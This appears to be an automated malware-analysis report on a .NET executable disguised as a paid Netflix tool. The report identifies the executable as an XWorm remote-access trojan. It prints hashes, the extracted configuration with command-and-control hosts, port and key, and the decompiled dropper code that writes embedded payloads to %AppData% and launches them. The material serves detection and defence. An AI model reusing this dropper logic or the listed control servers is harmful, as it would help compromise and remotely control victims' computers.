9ae4b7fdcca3458b25d1ac6f92a6a343
PE Executable | MD5: 9ae4b7fdcca3458b25d1ac6f92a6a343 | Size: 22.33 MB | application/x-dosexec
Symbol Obfuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 9ae4b7fdcca3458b25d1ac6f92a6a343
|
| Sha1 | 1ee094c8d737efc11e31ca90efe96fa6eda56426
|
| Sha256 | 3e73d70c5237fae087eb34eee86ab3398ffec5a11b6d9af660828f6762dacda9
|
| Sha384 | 2d6fc0a7cff36091f10d3166fb437e70583aba4bec795296b07ca5c70af1c866c0f918316fd6e0a6ce696d4936bddab4
|
| Sha512 | 595684974b8de4685357a4b9c66f27064582d08d9c9e167d3432c372e3af90969858cbf4fadaf8eeb7141aa578dda97d8130d4a24edf04300cc1652e4b0cd214
|
| SSDeep | 393216:l6JKUwRplBq7BvK6bR11/su6Yn0s4weuXA2siq+G9rWZ:cJRSlM7B5bHlsub0uQ2ibI
|
| TLSH | E12723B88C834975EB59C07C6631C701CDE5AF09BB385A5D38CD51098ADAEEFA84CD87
|
PeID
|
Config. Field0 | Value |
|---|---|
| ref_elem_0x0000000E | NETFLIX PAID (PAID API).exe-=>True-=>False |
| ref_elem_0x00000016 | 2.exe-=>True-=>False |
| VyfAV6LRQN3O5wa24ITTYOJybcdosVhcv4yLoZr0dLhCXyr5CE3THNWl87t | %AppData% |
| gQMsLa4obzmDfOAg8euQQ5ErT9CWn4ZDkiVJyrBWh22LKjmWc7mKItQ1K96 | -=> |
| UnspZzSX14Agi4mmDKLZISGX3fFMYCIgNUMI4GH4eU2w0edl0YodjNt0QKg | BY36CoPUlpJwAWnnZ |
|
Config. Field0 | Value |
|---|---|
| Mutex | 8iz1HWrNGOBtTIlc |
| Hosts | ItzJrx-35702.portmap.host,72.62.162.170 |
| Port | 6789 |
| KEY | <666666> |
| USBNM | <Xwormmm> |
| LoggerPath | %ProgramData% |
| family | xworm |
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | NETFLIX PAID (PAID API).exe |
| Full Name | NETFLIX PAID (PAID API).exe |
| EntryPoint | System.Void ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::CumWq7ZWOLQ5B788K3O9KCEvuj5aQPEH6lXc50Yu9fM4wNFuPTeTKOt244Y() |
| Scope Name | NETFLIX PAID (PAID API).exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | NETFLIX PAID (PAID API) |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 25 |
| Main Method | System.Void ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::CumWq7ZWOLQ5B788K3O9KCEvuj5aQPEH6lXc50Yu9fM4wNFuPTeTKOt244Y() |
| Main IL Instruction Count | 159 |
| Main IL | ldc.i4.1 <null> stloc.s V_5 call System.Boolean ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::Pgu55bU5NT5FcfTRU3LIYCHHSnkpHWCfIT5UGS8YUHevvlijGuJWrZpYIIc() brtrue.s IL_0013: call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() ldc.i4.2 <null> stloc.s V_5 ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() ldc.i4.1 <null> stloc.3 <null> ldc.i4.5 <null> stloc.s V_5 ldsfld System.Collections.Generic.List`1<System.String> ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::HjHobtbsuByPdjXCqvP2vai0qe61m0UgLIP3K3IkYHbXT3A38OyFlKfF46q callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.2 <null> br IL_0130: ldloca.s V_2 ldloca.s V_2 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.0 <null> ldc.i4.6 <null> stloc.s V_5 ldsfld System.String ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::VyfAV6LRQN3O5wa24ITTYOJybcdosVhcv4yLoZr0dLhCXyr5CE3THNWl87t call System.Object ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::sqAv4ROgBNiYyHGHjhXXinPMrs7HBVH9ygPwP462RXVlPKbEgD0vYcmr7Sy(System.String) ldstr \ call System.Object Microsoft.VisualBasic.CompilerServices.Operators::ConcatenateObject(System.Object,System.Object) ldloc.0 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) ldsfld System.String ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::gQMsLa4obzmDfOAg8euQQ5ErT9CWn4ZDkiVJyrBWh22LKjmWc7mKItQ1K96 ldc.i4.m1 <null> ldc.i4.0 <null> call System.String[] Microsoft.VisualBasic.Strings::Split(System.String,System.String,System.Int32,Microsoft.VisualBasic.CompareMethod) ldc.i4.0 <null> ldelem.ref <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::ConcatenateObject(System.Object,System.Object) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stloc.1 <null> ldc.i4.7 <null> stloc.s V_5 ldloc.0 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) ldsfld System.String ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::gQMsLa4obzmDfOAg8euQQ5ErT9CWn4ZDkiVJyrBWh22LKjmWc7mKItQ1K96 ldc.i4.m1 <null> ldc.i4.0 <null> call System.String[] Microsoft.VisualBasic.Strings::Split(System.String,System.String,System.Int32,Microsoft.VisualBasic.CompareMethod) ldc.i4.2 <null> ldelem.ref <null> ldstr True ldc.i4.0 <null> call System.Int32 Microsoft.VisualBasic.CompilerServices.Operators::CompareString(System.String,System.String,System.Boolean) ldc.i4.0 <null> bne.un.s IL_00CB: ldc.i4.s 13 ldc.i4.8 <null> stloc.s V_5 ldloc.1 <null> call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_00C9: br.s IL_0123 ldc.i4.s 9 stloc.s V_5 ldloc.1 <null> ldloc.0 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) ldsfld System.String ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::gQMsLa4obzmDfOAg8euQQ5ErT9CWn4ZDkiVJyrBWh22LKjmWc7mKItQ1K96 ldc.i4.m1 <null> ldc.i4.0 <null> call System.String[] Microsoft.VisualBasic.Strings::Split(System.String,System.String,System.Int32,Microsoft.VisualBasic.CompareMethod) ldc.i4.0 <null> ldelem.ref <null> call System.Byte[] ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::8lajdbM7c9LlIjVozKfuAwoujru42f6ummBC8j90I51RRQ9yvDcqeMOp0Gt(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldc.i4.s 10 stloc.s V_5 ldloc.1 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> br.s IL_0123: ldc.i4.s 19 ldc.i4.s 13 stloc.s V_5 ldc.i4.s 14 stloc.s V_5 ldloc.1 <null> ldloc.0 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) ldsfld System.String ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::gQMsLa4obzmDfOAg8euQQ5ErT9CWn4ZDkiVJyrBWh22LKjmWc7mKItQ1K96 ldc.i4.m1 <null> ldc.i4.0 <null> call System.String[] Microsoft.VisualBasic.Strings::Split(System.String,System.String,System.Int32,Microsoft.VisualBasic.CompareMethod) ldc.i4.0 <null> ldelem.ref <null> call System.Byte[] ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::8lajdbM7c9LlIjVozKfuAwoujru42f6ummBC8j90I51RRQ9yvDcqeMOp0Gt(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldc.i4.s 15 stloc.s V_5 ldloc.0 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) ldsfld System.String ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::gQMsLa4obzmDfOAg8euQQ5ErT9CWn4ZDkiVJyrBWh22LKjmWc7mKItQ1K96 ldc.i4.m1 <null> ldc.i4.0 <null> call System.String[] Microsoft.VisualBasic.Strings::Split(System.String,System.String,System.Int32,Microsoft.VisualBasic.CompareMethod) ldc.i4.1 <null> ldelem.ref <null> ldstr True ldc.i4.0 <null> call System.Int32 Microsoft.VisualBasic.CompilerServices.Operators::CompareString(System.String,System.String,System.Boolean) ldc.i4.0 <null> bne.un.s IL_0123: ldc.i4.s 19 ldc.i4.s 16 stloc.s V_5 ldloc.1 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldc.i4.s 19 stloc.s V_5 call System.Void System.GC::Collect() ldc.i4.s 20 stloc.s V_5 ldloca.s V_2 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue IL_002D: ldloca.s V_2 ldloca.s V_2 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() leave IL_01F8: ldloc.s V_4 ldloc.s V_4 br.s IL_0156: ldc.i4.0 ldloc.s V_4 ldc.i4.1 <null> add <null> ldc.i4.0 <null> stloc.s V_4 switch dnlib.DotNet.Emit.Instruction[] leave.s IL_01ED: ldc.i4 -2146828237 ldloc.s V_5 stloc.s V_4 ldloc.3 <null> switch dnlib.DotNet.Emit.Instruction[] leave.s IL_01ED: ldc.i4 -2146828237 isinst System.Exception ldnull <null> cgt.un <null> ldloc.3 <null> ldc.i4.0 <null> cgt.un <null> and <null> ldloc.s V_4 ldc.i4.0 <null> ceq <null> and <null> endfilter <null> castclass System.Exception call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) leave.s IL_01B8: ldloc.s V_5 ldc.i4 -2146828237 call System.Exception Microsoft.VisualBasic.CompilerServices.ProjectData::CreateProjectError(System.Int32) throw <null> ldloc.s V_4 brfalse.s IL_0201: ret call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() ret <null> |
| Module Name | NETFLIX PAID (PAID API).exe |
| Full Name | NETFLIX PAID (PAID API).exe |
| EntryPoint | System.Void ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::CumWq7ZWOLQ5B788K3O9KCEvuj5aQPEH6lXc50Yu9fM4wNFuPTeTKOt244Y() |
| Scope Name | NETFLIX PAID (PAID API).exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | NETFLIX PAID (PAID API) |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 25 |
| Main Method | System.Void ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::CumWq7ZWOLQ5B788K3O9KCEvuj5aQPEH6lXc50Yu9fM4wNFuPTeTKOt244Y() |
| Main IL Instruction Count | 159 |
| Main IL | ldc.i4.1 <null> stloc.s V_5 call System.Boolean ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::Pgu55bU5NT5FcfTRU3LIYCHHSnkpHWCfIT5UGS8YUHevvlijGuJWrZpYIIc() brtrue.s IL_0013: call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() ldc.i4.2 <null> stloc.s V_5 ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() ldc.i4.1 <null> stloc.3 <null> ldc.i4.5 <null> stloc.s V_5 ldsfld System.Collections.Generic.List`1<System.String> ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::HjHobtbsuByPdjXCqvP2vai0qe61m0UgLIP3K3IkYHbXT3A38OyFlKfF46q callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.2 <null> br IL_0130: ldloca.s V_2 ldloca.s V_2 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.0 <null> ldc.i4.6 <null> stloc.s V_5 ldsfld System.String ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::VyfAV6LRQN3O5wa24ITTYOJybcdosVhcv4yLoZr0dLhCXyr5CE3THNWl87t call System.Object ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::sqAv4ROgBNiYyHGHjhXXinPMrs7HBVH9ygPwP462RXVlPKbEgD0vYcmr7Sy(System.String) ldstr \ call System.Object Microsoft.VisualBasic.CompilerServices.Operators::ConcatenateObject(System.Object,System.Object) ldloc.0 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) ldsfld System.String ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::gQMsLa4obzmDfOAg8euQQ5ErT9CWn4ZDkiVJyrBWh22LKjmWc7mKItQ1K96 ldc.i4.m1 <null> ldc.i4.0 <null> call System.String[] Microsoft.VisualBasic.Strings::Split(System.String,System.String,System.Int32,Microsoft.VisualBasic.CompareMethod) ldc.i4.0 <null> ldelem.ref <null> call System.Object Microsoft.VisualBasic.CompilerServices.Operators::ConcatenateObject(System.Object,System.Object) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stloc.1 <null> ldc.i4.7 <null> stloc.s V_5 ldloc.0 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) ldsfld System.String ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::gQMsLa4obzmDfOAg8euQQ5ErT9CWn4ZDkiVJyrBWh22LKjmWc7mKItQ1K96 ldc.i4.m1 <null> ldc.i4.0 <null> call System.String[] Microsoft.VisualBasic.Strings::Split(System.String,System.String,System.Int32,Microsoft.VisualBasic.CompareMethod) ldc.i4.2 <null> ldelem.ref <null> ldstr True ldc.i4.0 <null> call System.Int32 Microsoft.VisualBasic.CompilerServices.Operators::CompareString(System.String,System.String,System.Boolean) ldc.i4.0 <null> bne.un.s IL_00CB: ldc.i4.s 13 ldc.i4.8 <null> stloc.s V_5 ldloc.1 <null> call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_00C9: br.s IL_0123 ldc.i4.s 9 stloc.s V_5 ldloc.1 <null> ldloc.0 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) ldsfld System.String ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::gQMsLa4obzmDfOAg8euQQ5ErT9CWn4ZDkiVJyrBWh22LKjmWc7mKItQ1K96 ldc.i4.m1 <null> ldc.i4.0 <null> call System.String[] Microsoft.VisualBasic.Strings::Split(System.String,System.String,System.Int32,Microsoft.VisualBasic.CompareMethod) ldc.i4.0 <null> ldelem.ref <null> call System.Byte[] ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::8lajdbM7c9LlIjVozKfuAwoujru42f6ummBC8j90I51RRQ9yvDcqeMOp0Gt(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldc.i4.s 10 stloc.s V_5 ldloc.1 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> br.s IL_0123: ldc.i4.s 19 ldc.i4.s 13 stloc.s V_5 ldc.i4.s 14 stloc.s V_5 ldloc.1 <null> ldloc.0 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) ldsfld System.String ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::gQMsLa4obzmDfOAg8euQQ5ErT9CWn4ZDkiVJyrBWh22LKjmWc7mKItQ1K96 ldc.i4.m1 <null> ldc.i4.0 <null> call System.String[] Microsoft.VisualBasic.Strings::Split(System.String,System.String,System.Int32,Microsoft.VisualBasic.CompareMethod) ldc.i4.0 <null> ldelem.ref <null> call System.Byte[] ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::8lajdbM7c9LlIjVozKfuAwoujru42f6ummBC8j90I51RRQ9yvDcqeMOp0Gt(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldc.i4.s 15 stloc.s V_5 ldloc.0 <null> call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) ldsfld System.String ASmcX3clSM4psxk1UxuCgfjvatAs52NkX8vvvZZhOWeIKmxHyrVAHef5WsM::gQMsLa4obzmDfOAg8euQQ5ErT9CWn4ZDkiVJyrBWh22LKjmWc7mKItQ1K96 ldc.i4.m1 <null> ldc.i4.0 <null> call System.String[] Microsoft.VisualBasic.Strings::Split(System.String,System.String,System.Int32,Microsoft.VisualBasic.CompareMethod) ldc.i4.1 <null> ldelem.ref <null> ldstr True ldc.i4.0 <null> call System.Int32 Microsoft.VisualBasic.CompilerServices.Operators::CompareString(System.String,System.String,System.Boolean) ldc.i4.0 <null> bne.un.s IL_0123: ldc.i4.s 19 ldc.i4.s 16 stloc.s V_5 ldloc.1 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldc.i4.s 19 stloc.s V_5 call System.Void System.GC::Collect() ldc.i4.s 20 stloc.s V_5 ldloca.s V_2 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue IL_002D: ldloca.s V_2 ldloca.s V_2 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() leave IL_01F8: ldloc.s V_4 ldloc.s V_4 br.s IL_0156: ldc.i4.0 ldloc.s V_4 ldc.i4.1 <null> add <null> ldc.i4.0 <null> stloc.s V_4 switch dnlib.DotNet.Emit.Instruction[] leave.s IL_01ED: ldc.i4 -2146828237 ldloc.s V_5 stloc.s V_4 ldloc.3 <null> switch dnlib.DotNet.Emit.Instruction[] leave.s IL_01ED: ldc.i4 -2146828237 isinst System.Exception ldnull <null> cgt.un <null> ldloc.3 <null> ldc.i4.0 <null> cgt.un <null> and <null> ldloc.s V_4 ldc.i4.0 <null> ceq <null> and <null> endfilter <null> castclass System.Exception call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) leave.s IL_01B8: ldloc.s V_5 ldc.i4 -2146828237 call System.Exception Microsoft.VisualBasic.CompilerServices.ProjectData::CreateProjectError(System.Int32) throw <null> ldloc.s V_4 brfalse.s IL_0201: ret call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() ret <null> |
|
Name0 | Value |
|---|---|
| Mutex | 8iz1HWrNGOBtTIlc |
| CnC | ItzJrx-35702.portmap.host |
| CnC | 72.62.162.170 |
| Port | 6789 |
|
Config. Field0 | Value |
|---|---|
| ref_elem_0x0000000E | NETFLIX PAID (PAID API).exe-=>True-=>False |
| ref_elem_0x00000016 | 2.exe-=>True-=>False |
| VyfAV6LRQN3O5wa24ITTYOJybcdosVhcv4yLoZr0dLhCXyr5CE3THNWl87t | %AppData% |
| gQMsLa4obzmDfOAg8euQQ5ErT9CWn4ZDkiVJyrBWh22LKjmWc7mKItQ1K96 | -=> |
| UnspZzSX14Agi4mmDKLZISGX3fFMYCIgNUMI4GH4eU2w0edl0YodjNt0QKg | BY36CoPUlpJwAWnnZ |
|
Config. Field0 | Value |
|---|---|
| Mutex | 8iz1HWrNGOBtTIlc |
| Hosts | ItzJrx-35702.portmap.host,72.62.162.170 |
| Port | 6789 |
| KEY | <666666> |
| USBNM | <Xwormmm> |
| LoggerPath | %ProgramData% |
| family | xworm |
|
Name0 | Value | Location |
|---|---|---|
| Mutex | 8iz1HWrNGOBtTIlc Malicious |
9ae4b7fdcca3458b25d1ac6f92a6a343 > .Net Resources > hbrkpexfkfoabzv.Resources > NETFLIX PAID (PAID API).exe > NETFLIX PAID (PAID API).exe [AES Decoded] |
| CnC | ItzJrx-35702.portmap.host Malicious |
9ae4b7fdcca3458b25d1ac6f92a6a343 > .Net Resources > hbrkpexfkfoabzv.Resources > NETFLIX PAID (PAID API).exe > NETFLIX PAID (PAID API).exe [AES Decoded] |
| CnC | 72.62.162.170 Malicious |
9ae4b7fdcca3458b25d1ac6f92a6a343 > .Net Resources > hbrkpexfkfoabzv.Resources > NETFLIX PAID (PAID API).exe > NETFLIX PAID (PAID API).exe [AES Decoded] |
| Port | 6789 Malicious |
9ae4b7fdcca3458b25d1ac6f92a6a343 > .Net Resources > hbrkpexfkfoabzv.Resources > NETFLIX PAID (PAID API).exe > NETFLIX PAID (PAID API).exe [AES Decoded] |